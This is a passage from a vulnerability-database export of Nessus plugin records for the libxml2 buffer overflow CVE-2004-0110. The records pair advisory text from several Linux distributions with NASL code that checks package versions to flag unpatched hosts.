value:\"p-cpe:/a:mandriva:linux:lib64xml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libxml2-2.5.4-1.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libxml2-devel-2.5.4-1.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libxml2-python-2.5.4-1.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libxml2-utils-2.5.4-1.2.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64xml2-2.5.11-1.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64xml2-devel-2.5.11-1.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64xml2-python-2.5.11-1.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libxml2-2.5.11-1.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libxml2-devel-2.5.11-1.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libxml2-python-2.5.11-1.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"libxml2-utils-2.5.11-1.2.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:48", "description": "The remote host is affected by the vulnerability described in GLSA-200403-01\n(Libxml2 URI Parsing Buffer Overflow Vulnerabilities)\n\n Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6.\n When the libxml2 library fetches a remote resource via FTP or HTTP, libxml2\n uses parsing routines that can overflow a buffer caused by improper bounds\n checking if they are passed a URL longer than 4096 bytes.\n \nImpact :\n\n If an attacker is able to exploit an application using libxml2 that parses\n remote resources, then this flaw could be used to execute arbitrary code.\n \nWorkaround :\n\n No workaround is available; users are urged to upgrade libxml2 to 2.6.6.", "edition": 23, "published": "2004-08-30T00:00:00", "title": "GLSA-200403-01 : Libxml2 URI Parsing Buffer Overflow Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "modified": "2004-08-30T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:libxml2"], "id": "GENTOO_GLSA-200403-01.NASL", "href": "https://www.tenable.com/plugins/nessus/14452", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200403-01.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14452);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0110\");\n script_xref(name:\"GLSA\", value:\"200403-01\");\n\n script_name(english:\"GLSA-200403-01 : Libxml2 URI Parsing Buffer Overflow Vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200403-01\n(Libxml2 URI Parsing Buffer Overflow Vulnerabilities)\n\n Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6.\n When the libxml2 library fetches a remote resource via FTP or HTTP, libxml2\n uses parsing routines that can overflow a buffer caused by improper bounds\n checking if they are passed a URL longer than 4096 bytes.\n \nImpact :\n\n If an attacker is able to exploit an application using libxml2 that parses\n remote resources, then this flaw could be used to execute arbitrary code.\n \nWorkaround :\n\n No workaround is available; users are urged to upgrade libxml2 to 2.6.6.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200403-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All users are recommended to upgrade their libxml2 installation:\n # emerge sync\n # emerge -pv '>=dev-libs/libxml2-2.6.6'\n # emerge '>=dev-libs/libxml2-2.6.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/libxml2\", unaffected:make_list(\"ge 2.6.6\"), vulnerable:make_list(\"lt 2.6.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dev-libs/libxml2\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:57:56", "description": "libxml2 is a library for manipulating XML files.\n\nYuuichi Teranishi (Si Xi Yu [?] ) discovered a flaw in libxml, the\nGNOME XML library. When fetching a remote resource via FTP or HTTP,\nthe library uses special parsing routines which can overflow a buffer\nif passed a very long URL. If an attacker is able to find an\napplication using libxml1 or libxml2 that parses remote resources and\nallows the attacker to craft the URL, then this flaw could be used to\nexecute arbitrary code.", "edition": 24, "published": "2004-09-29T00:00:00", "title": "Debian DSA-455-1 : libxml - buffer overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:libxml", "p-cpe:/a:debian:debian_linux:libxml2"], "id": "DEBIAN_DSA-455.NASL", "href": "https://www.tenable.com/plugins/nessus/15292", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-455. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15292);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0110\");\n script_bugtraq_id(9718);\n script_xref(name:\"DSA\", value:\"455\");\n\n script_name(english:\"Debian DSA-455-1 : libxml - buffer overflows\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libxml2 is a library for manipulating XML files.\n\nYuuichi Teranishi (Si Xi Yu [?] ) discovered a flaw in libxml, the\nGNOME XML library. When fetching a remote resource via FTP or HTTP,\nthe library uses special parsing routines which can overflow a buffer\nif passed a very long URL. If an attacker is able to find an\napplication using libxml1 or libxml2 that parses remote resources and\nallows the attacker to craft the URL, then this flaw could be used to\nexecute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-455\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libxml1 and libxml2 packages.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.8.17-2woody1 of libxml and version 2.4.19-4woody1 of\nlibxml2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libxml-dev\", reference:\"1.8.17-2woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxml1\", reference:\"1.8.17-2woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxml2\", reference:\"2.4.19-4woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxml2-dev\", reference:\"2.4.19-4woody1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:05:18", "description": "Updated libxml2 packages that fix an overflow when parsing remote\nresources are now available.\n\nlibxml2 is a library for manipulating XML files.\n\nYuuichi Teranishi discovered a flaw in libxml2 versions prior to\n2.6.6. When fetching a remote resource via FTP or HTTP, libxml2 uses\nspecial parsing routines. These routines can overflow a buffer if\npassed a very long URL. If an attacker is able to find an application\nusing libxml2 that parses remote resources and allows them to\ninfluence the URL, then this flaw could be used to execute arbitrary\ncode. The Common Vulnerabilities and Exposures project (cve.mitre.org)\nhas assigned the name CVE-2004-0110 to this issue.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported fix and are not vulnerable to this issue.", "edition": 28, "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 / 3 : libxml2 (RHSA-2004:090)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "modified": "2004-07-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:libxml2-devel", "p-cpe:/a:redhat:enterprise_linux:libxml2-python", "p-cpe:/a:redhat:enterprise_linux:libxml2"], "id": "REDHAT-RHSA-2004-090.NASL", "href": "https://www.tenable.com/plugins/nessus/12474", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:090. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12474);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0110\");\n script_bugtraq_id(9718);\n script_xref(name:\"RHSA\", value:\"2004:090\");\n\n script_name(english:\"RHEL 2.1 / 3 : libxml2 (RHSA-2004:090)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated libxml2 packages that fix an overflow when parsing remote\nresources are now available.\n\nlibxml2 is a library for manipulating XML files.\n\nYuuichi Teranishi discovered a flaw in libxml2 versions prior to\n2.6.6. When fetching a remote resource via FTP or HTTP, libxml2 uses\nspecial parsing routines. These routines can overflow a buffer if\npassed a very long URL. If an attacker is able to find an application\nusing libxml2 that parses remote resources and allows them to\ninfluence the URL, then this flaw could be used to execute arbitrary\ncode. The Common Vulnerabilities and Exposures project (cve.mitre.org)\nhas assigned the name CVE-2004-0110 to this issue.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported fix and are not vulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0110\"\n );\n # http://mail.gnome.org/archives/xml/2004-February/msg00070.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mail.gnome.org/archives/xml/2004-February/msg00070.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:090\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libxml2, libxml2-devel and / or libxml2-python\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(2\\.1|3)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:090\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"libxml2-2.4.19-5.ent\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"libxml2-devel-2.4.19-5.ent\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"libxml2-python-2.4.19-5.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"libxml2-2.5.10-6\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"libxml2-devel-2.5.10-6\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"libxml2-python-2.5.10-6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-devel / libxml2-python\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:02:49", "description": "This update fixes a buffer overflow in the DNS handling code\n(CVE-2004-0110). This bug can be exploited remotely via a DNS server\nunder the control of the attacker.", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : libxml2 (YOU Patch Number 9581)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_9581.NASL", "href": "https://www.tenable.com/plugins/nessus/41342", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41342);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0110\");\n\n script_name(english:\"SuSE9 Security Update : libxml2 (YOU Patch Number 9581)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a buffer overflow in the DNS handling code\n(CVE-2004-0110). This bug can be exploited remotely via a DNS server\nunder the control of the attacker.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2004-0110/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 9581.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"libxml2-2.6.7-28.7\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"libxml2-devel-2.6.7-28.7\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"libxml2-32bit-9-200412202049\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:24:47", "description": "An updated libxml package that fixes multiple buffer overflows is now\navailable.\n\n[Updated 24 May 2005] Multilib packages have been added to this\nadvisory\n\nThe libxml package contains a library for manipulating XML files.\n\nMultiple buffer overflow bugs have been found in libxml versions prior\nto 2.6.14. If an attacker can trick a user into passing a specially\ncrafted FTP URL or FTP proxy URL to an application that uses the\nvulnerable functions of libxml, it could be possible to execute\narbitrary code. Additionally, if an attacker can return a specially\ncrafted DNS request to libxml, it could be possible to execute\narbitrary code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0989 to this issue.\n\nYuuichi Teranishi discovered a flaw in libxml versions prior to 2.6.6.\nWhen fetching a remote resource via FTP or HTTP, libxml uses special\nparsing routines. These routines can overflow a buffer if passed a\nvery long URL. If an attacker is able to find an application using\nlibxml that parses remote resources and allows them to influence the\nURL, then this flaw could be used to execute arbitrary code. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0110 to this issue.\n\nAll users are advised to upgrade to this updated package, which\ncontains backported patches and is not vulnerable to these issues.", "edition": 26, "published": "2006-07-03T00:00:00", "title": "CentOS 3 : libxml (CESA-2004:650)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110", "CVE-2004-0989"], "modified": "2006-07-03T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libxml", "p-cpe:/a:centos:centos:libxml-devel", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2004-650.NASL", "href": "https://www.tenable.com/plugins/nessus/21794", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:650 and \n# CentOS Errata and Security Advisory 2004:650 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21794);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0110\", \"CVE-2004-0989\");\n script_bugtraq_id(9718);\n script_xref(name:\"RHSA\", value:\"2004:650\");\n\n script_name(english:\"CentOS 3 : libxml (CESA-2004:650)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated libxml package that fixes multiple buffer overflows is now\navailable.\n\n[Updated 24 May 2005] Multilib packages have been added to this\nadvisory\n\nThe libxml package contains a library for manipulating XML files.\n\nMultiple buffer overflow bugs have been found in libxml versions prior\nto 2.6.14. If an attacker can trick a user into passing a specially\ncrafted FTP URL or FTP proxy URL to an application that uses the\nvulnerable functions of libxml, it could be possible to execute\narbitrary code. Additionally, if an attacker can return a specially\ncrafted DNS request to libxml, it could be possible to execute\narbitrary code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0989 to this issue.\n\nYuuichi Teranishi discovered a flaw in libxml versions prior to 2.6.6.\nWhen fetching a remote resource via FTP or HTTP, libxml uses special\nparsing routines. These routines can overflow a buffer if passed a\nvery long URL. If an attacker is able to find an application using\nlibxml that parses remote resources and allows them to influence the\nURL, then this flaw could be used to execute arbitrary code. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0110 to this issue.\n\nAll users are advised to upgrade to this updated package, which\ncontains backported patches and is not vulnerable to these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-May/011765.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?784e2f8f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-May/011766.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fed3aced\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 